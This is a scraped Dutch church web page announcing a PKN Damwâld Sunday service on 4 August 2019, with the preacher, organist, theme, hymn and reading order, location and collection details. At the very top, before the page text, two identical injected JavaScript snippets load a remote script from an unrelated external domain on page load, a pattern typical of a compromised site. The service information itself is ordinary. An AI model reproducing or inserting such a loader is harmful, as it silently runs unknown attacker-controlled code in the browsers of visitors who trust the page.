;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 augustus 2019 9:30 uur - PKN Damwâld
zondag 4 augustus 2019
09:30 uur

Kerkdienst zondag 4 augustus 2019 9:30 uur

Thema: “Hebben jullie de Heilige Geest ontvangen toen jullie het geloof aanvaarden?”

Informatie

Voorganger:Mw. R. van der Wal-Akker, Morra
Organist:Tim van der Weide
Thema:“Hebben jullie de Heilige Geest ontvangen toen jullie het geloof aanvaarden?”
Liturgie
Lied voor de dienst Gezang 434 : 1, 2 en 5
Welkom
Intochtslied Psalm 119 vers 1, 12 en 66
Stil gebed en woorden van bemoediging
We zingen: Gezang 320 : 1 en 2
leefregels Galaten 5, 22 t/m 25
We zingen: Gezang 320 : 3 en 4
Gebed
We lezen: Handelingen 18 vanaf vers 23 t/m Handelingen 19 vers 6
We zingen: ELB 79
Verkondiging Handelingen 19 vers 2
We zingen: gezang 477
Dankgebed en voorbede
We zingen: gezang 257
Collecte
Slotlied gezang 255
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Kerk
Uitganscollecte: Kerk